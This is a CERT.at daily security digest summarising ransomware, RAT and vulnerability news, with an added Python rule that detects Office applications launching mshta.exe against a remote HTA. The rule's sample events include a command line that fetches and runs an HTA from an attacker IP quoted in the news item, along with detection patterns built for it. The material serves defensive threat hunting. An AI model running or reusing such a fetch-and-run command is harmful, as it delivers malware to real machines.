[CERT-daily] Daily summary - 11.11.2024
Daily end-of-shift report
team at cert.at
Mon Nov 11 18:40:46 CET 2024
=====================
= End-of-Day report =
=====================
Timeframe: Friday 08-11-2024 18:00 - Monday 11-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
*** Palo Alto investigates possible security vulnerability in PAN-OS web interface ***
---------------------------------------------
Palo Alto is investigating an alleged code-injection vulnerability in the management interface of PAN-OS. A subset of affected customers is being notified. [..] Palo Alto strongly advises customers to ensure that access to the management interface is configured correctly and in line with the recommended best-practice guidelines. The company also provides a guide for this.
---------------------------------------------
https://www.heise.de/-10013896.html
*** Credentials from 2023 exploited for access - "Helldown Leaks" ransomware compromises companies via Zyxel firewalls ***
---------------------------------------------
Since roughly the beginning of August 2024, companies worldwide have been encrypted by the ransomware group "Helldown Leaks". Zyxel firewalls can consistently be identified as the initial attack vector, even when they are running the latest software version.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/11/zugangsdaten-aus-2023-fur-zugriff-ausgenutzt-helldown-leaks-ransomware-kompromittiert-unternehmen-uber-zyxel-firewalls
*** Testing the Koord2ool ***
---------------------------------------------
As part of the EU-funded project “AWAKE”, we built the Koord2ool, which is a tool that allowed us to track the state of an incident across our constituency over time. We implemented this application as an extension to LimeSurvey (an Open Source survey tool) which generates a dashboard to visualize the state of the answers over time.
---------------------------------------------
https://www.cert.at/en/blog/2024/11/testing-the-koord2ool
*** Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware ***
---------------------------------------------
Cybersecurity researchers have discovered a new phishing campaign that spreads a new fileless variant of known commercial malware called Remcos RAT. [..] The malicious Excel document is designed to exploit a known remote code execution flaw in Office (CVE-2017-0199, CVSS score: 7.8) to download an HTML Application (HTA) file ("cookienetbookinetcahce.hta") from a remote server ("192.3.220[.]22") and launch it using mshta.exe.
---------------------------------------------
https://thehackernews.com/2024/11/cybercriminals-use-excel-exploit-to.html
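The chain quoted above (Office document exploiting CVE-2017-0199, which fetches a remote HTA and runs it through mshta.exe) leaves a clear trace in process-creation telemetry: an Office application as parent, mshta.exe as child, and a remote target on the command line. The following is an added detection example, not code from the CERT.at digest or from the article it quotes. The log format (key=value pairs separated by '|') and the sample events are constructed for this example; the IP address and HTA filename reused in one sample line are the indicators the article quotes.

```python
"""Flag Office -> mshta.exe process creations with a remote HTA target.

Added example (not part of the digest or the quoted article). The event
format below is constructed; real telemetry (e.g. Sysmon event 1) carries
the same ParentImage / Image / CommandLine fields under its own layout.
"""
import re
from dataclasses import dataclass

# Office applications whose child mshta.exe is suspicious (assumed set).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# A remote HTA target on the mshta command line: http/https URL or UNC path.
REMOTE_TARGET = re.compile(r"(?i)(?:https?://\S+|\\\\[^\\\s]+\\\S+)")
# Indicators quoted in the article (the IP is defanged there as 192.3.220[.]22).
ARTICLE_INDICATORS = {"192.3.220.22", "cookienetbookinetcahce.hta"}


@dataclass(frozen=True)
class Finding:
    line_no: int
    parent: str
    target: str
    matches_article_ioc: bool


def parse_event(line):
    """Parse one 'key=value|key=value' line into a dict with lower-cased keys."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_office_to_mshta(lines):
    """Return a Finding for every Office-parented mshta.exe with a remote target."""
    findings = []
    for n, line in enumerate(lines, 1):
        ev = parse_event(line)
        parent = basename(ev.get("parentimage", ""))
        image = basename(ev.get("image", ""))
        cmd = ev.get("commandline", "")
        if parent not in OFFICE_PARENTS or image != "mshta.exe":
            continue
        m = REMOTE_TARGET.search(cmd)
        if not m:
            continue  # local .hta only; a separate, lower-severity rule could cover it
        target = m.group(0)
        ioc = any(ind in target.lower() for ind in ARTICLE_INDICATORS)
        findings.append(Finding(n, parent, target, ioc))
    return findings


# Constructed sample events: one benign Office child, the chain from the
# article, an explorer-parented mshta, and an Office-parented local .hta.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\splwow64.exe|CommandLine=splwow64.exe 12288",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://192.3.220.22/cookienetbookinetcahce.hta",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe C:\Users\u\Desktop\wizard.hta",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe C:\Temp\local.hta",
]

if __name__ == "__main__":
    for f in detect_office_to_mshta(SAMPLE_EVENTS):
        print(f"line {f.line_no}: {f.parent} -> mshta.exe {f.target} "
              f"(article IoC: {f.matches_article_ioc})")
```

The rule keys on behaviour (parent/child pair plus a remote target) rather than on the quoted indicators alone, so it still fires when the campaign rotates its server or filename; the indicator match is reported separately as corroboration for threat hunting.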
*** #StopRansomware: Black Basta ***
---------------------------------------------
Updates to this advisory, originally published May 10, 2024 [..] The advisory was updated to reflect new TTPs employed by Black Basta affiliates, as well as provide current IOCs/remove outdated IOCs for effective threat hunting.
---------------------------------------------
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a
*** Cyberattack causes credit card readers to malfunction in Israel ***
---------------------------------------------
As reported by the Jerusalem Post, the cause was a distributed denial-of-service attack (DDoS) that targeted the payment gateway company Hyp’s CreditGuard product. The attack disrupted communications between the card terminals and the wider payment system, but was not capable of stealing information or payments.
---------------------------------------------
https://therecord.media/cyberattack-causes-credit-card-readers-in-israel-to-malfunction
*** Malware Steals Account Credentials ***
---------------------------------------------
It’s common for malware to target e-commerce sites, and these attackers are usually seeking to steal credit card details. In most cases, they will insert scripts that extract data from the checkout forms to siphon fields like the cardholder name, card number and expiration date. [..] However, every now and then we encounter a case where in addition to that they are also looking to steal details for accounts that customers have created on these sites along with admin account credentials. We’ll explore one such case.
---------------------------------------------
https://blog.sucuri.net/2024/11/malware-steals-account-credentials.html
*** Known Attacks On Elliptic Curve Cryptography ***
---------------------------------------------
In recent years the Elliptic Curve Cryptography approach has become popular due to its high efficiency and strong security. The purpose of this article is to present this topic in a relatively clearer way than it exists today on the internet.
---------------------------------------------
https://github.com/elikaski/ECC_Attacks
*** Pishi: Coverage guided macOS KEXT fuzzing ***
---------------------------------------------
In this blog post I will try to explain everything as clearly as possible so that even those who are not familiar with fuzzing can enjoy and understand it. I’ll break down the concepts and provide relatable examples and resources. My goal is to make fuzzing approachable and interesting.
---------------------------------------------
https://r00tkitsmm.github.io/fuzzing/2024/11/08/Pishi.html
=====================
= Vulnerabilities =
=====================
*** Veeam Backup Enterprise Manager: Unauthorized access by attackers possible ***
---------------------------------------------
If attackers successfully exploit the vulnerability (CVE-2024-40715, rated "high"), they can bypass authentication and eavesdrop on connections as a man-in-the-middle. How exactly this could play out is not yet known. [..] A security patch is available for download.
---------------------------------------------
https://www.heise.de/-10018234.html
*** Security updates for Monday ***
---------------------------------------------
Security updates have been issued by AlmaLinux (podman), Debian (guix, libarchive, and nss), Fedora (expat, iaito, opendmarc, python-werkzeug, radare2, squid, and xorg-x11-server), Mageia (htmldoc, libheif, nspr, nss, firefox & rust, python-urllib3, python-werkzeug, quictls, ruby-webrick, and thunderbird), Oracle (firefox and NetworkManager-libreswan), SUSE (apache2, chromedriver, chromium, coredns, expat, govulncheck-vulndb, httpcomponents-client, java-17-openjdk, java-21-openjdk, libheif, python-wxPython, python311, python312, qbittorrent, ruby3.3-rubygem-actionmailer, ruby3.3-rubygem-actiontext, ruby3.3-rubygem-puma, ruby3.3-rubygem-rails, and virtualbox), and Ubuntu (openjdk-17, openjdk-21, openjdk-8, openjdk-lts, and qemu).
---------------------------------------------
https://lwn.net/Articles/997774/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily